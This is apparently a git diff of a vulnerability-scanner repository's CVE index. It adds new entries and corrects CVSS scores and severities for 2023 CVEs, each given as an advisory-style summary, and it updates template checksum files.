for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"} {"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"high","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"} +{"ID":"CVE-2023-26469","Info":{"Name":"Jorani 1.0.0 - Remote Code Execution","Severity":"critical","Description":"Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26469.yaml"} {"ID":"CVE-2023-26842","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26842.yaml"} {"ID":"CVE-2023-26843","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26843.yaml"} {"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"} @@ -1937,7 +1942,7 @@ {"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"high","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"} {"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"} {"ID":"CVE-2023-28432","Info":{"Name":"MinIO Cluster Deployment - Information Disclosure","Severity":"high","Description":"MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-28432.yaml"} -{"ID":"CVE-2023-28665","Info":{"Name":"Woo Bulk Price Update \u003c2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The Woo Bulk Price Update WordPress plugin, in versions \u003c 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-28665.yaml"} +{"ID":"CVE-2023-28665","Info":{"Name":"Woo Bulk Price Update \u003c2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The Woo Bulk Price Update WordPress plugin, in versions \u003c 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-28665.yaml"} {"ID":"CVE-2023-29084","Info":{"Name":"ManageEngine ADManager Plus - Command Injection","Severity":"high","Description":"Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-29084.yaml"} {"ID":"CVE-2023-29298","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29298.yaml"} {"ID":"CVE-2023-29300","Info":{"Name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","Severity":"critical","Description":"Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29300.yaml"} @@ -1969,6 +1974,7 @@ {"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"} {"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"} {"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"} +{"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"high","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"} {"ID":"CVE-2023-34362","Info":{"Name":"MOVEit Transfer - Remote Code Execution","Severity":"critical","Description":"In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34362.yaml"} {"ID":"CVE-2023-34537","Info":{"Name":"Hoteldruid 3.0.5 - Cross-Site Scripting","Severity":"medium","Description":"A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-34537.yaml"} {"ID":"CVE-2023-34598","Info":{"Name":"Gibbon v25.0.0 - Local File Inclusion","Severity":"critical","Description":"Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34598.yaml"} @@ -1977,31 +1983,31 @@ {"ID":"CVE-2023-34659","Info":{"Name":"JeecgBoot 3.5.0 - SQL Injection","Severity":"critical","Description":"jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34659.yaml"} {"ID":"CVE-2023-3479","Info":{"Name":"Hestiacp \u003c= 1.7.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3479.yaml"} {"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"} -{"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"high","Description":"A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"} -{"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"} -{"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"} +{"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"critical","Description":"A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"} +{"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"} +{"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"} {"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"} {"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"} {"ID":"CVE-2023-35885","Info":{"Name":"Cloudpanel 2 \u003c 2.3.1 - Remote Code Execution","Severity":"critical","Description":"CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35885.yaml"} {"ID":"CVE-2023-36287","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36287.yaml"} {"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"} {"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross-site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"} -{"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"critical","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"} +{"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"} {"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"} {"ID":"CVE-2023-37265","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Internal IP","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37265.yaml"} {"ID":"CVE-2023-37266","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Random JWT Token","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37266.yaml"} -{"ID":"CVE-2023-37270","Info":{"Name":"Piwigo 13.7.0 - SQL Injection","Severity":"high","Description":"Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately.\n","Classification":{"CVSSScore":"7.6"}},"file_path":"http/cves/2023/CVE-2023-37270.yaml"} -{"ID":"CVE-2023-37462","Info":{"Name":"XWiki Platform - Remote Code Execution","Severity":"critical","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2023/CVE-2023-37462.yaml"} -{"ID":"CVE-2023-37580","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"medium","Description":"Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-37580.yaml"} -{"ID":"CVE-2023-3765","Info":{"Name":"MLflow Absolute Path Traversal","Severity":"critical","Description":"Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2023/CVE-2023-3765.yaml"} +{"ID":"CVE-2023-37270","Info":{"Name":"Piwigo 13.7.0 - SQL Injection","Severity":"high","Description":"Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-37270.yaml"} +{"ID":"CVE-2023-37462","Info":{"Name":"XWiki Platform - Remote Code Execution","Severity":"high","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-37462.yaml"} +{"ID":"CVE-2023-37580","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"medium","Description":"Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37580.yaml"} +{"ID":"CVE-2023-3765","Info":{"Name":"MLflow Absolute Path Traversal","Severity":"critical","Description":"Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-3765.yaml"} {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} -{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"high","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} -{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"} -{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"} +{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} +{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"} +{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"} {"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"} -{"ID":"CVE-2023-39141","Info":{"Name":"Aria2 WebUI - Path traversal","Severity":"high","Description":"webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39141.yaml"} -{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.4"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"} -{"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"} +{"ID":"CVE-2023-39141","Info":{"Name":"Aria2 WebUI - Path traversal","Severity":"high","Description":"webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39141.yaml"} +{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"} +{"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"} {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"} -{"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} +{"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index b879f27d74..e3e9b611d8 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -308d34aa657fe5afcd52692063fe2203 +a9e7ce585ba796a3d01ee394a6809fad From dc4048ef96378ced96d46f3ad4d5933058a42f74 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 4 Sep 2023 10:18:06 +0000 Subject: [PATCH 0105/1090] Auto Generated Templates Checksum [Mon Sep 4 10:18:06 UTC 2023] :robot: --- templates-checksum.txt | 4002 ++++++++++++++++++++-------------------- 1 file changed, 2001 insertions(+), 2001 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index eefa0e60d0..24126fffc0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -546,7 +546,7 @@ helpers/wordpress/plugins/wordfence.txt:40784b4a67e4ba8b48f28ea24427fa8550433cc1 helpers/wordpress/plugins/wordpress-importer.txt:08208ac734b4811a00c6728e5ae1c066d2e06cc8 helpers/wordpress/plugins/wordpress-seo.txt:18b66e1ee3dc142534c1d5c03f7bded8db5d3466 helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/wp-fastest-cache.txt:a8ca9029438bddc6caceb1aae00246b568722654 +helpers/wordpress/plugins/wp-fastest-cache.txt:ff3f1d7d10cbdc5507eb5d03d8f7d10b89642646 helpers/wordpress/plugins/wp-file-manager.txt:9d90f00e19f5543904caf9ab2abd5b800e0613c0 helpers/wordpress/plugins/wp-google-maps.txt:7351876974e6ca881692e0a333a7d1724293977e helpers/wordpress/plugins/wp-mail-smtp.txt:27e1606dc0a2a0c2fa59fc7f5fefdaeacc0b2794 @@ -619,2019 +619,2019 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:02e294ce7b26d5732d8fc396fc 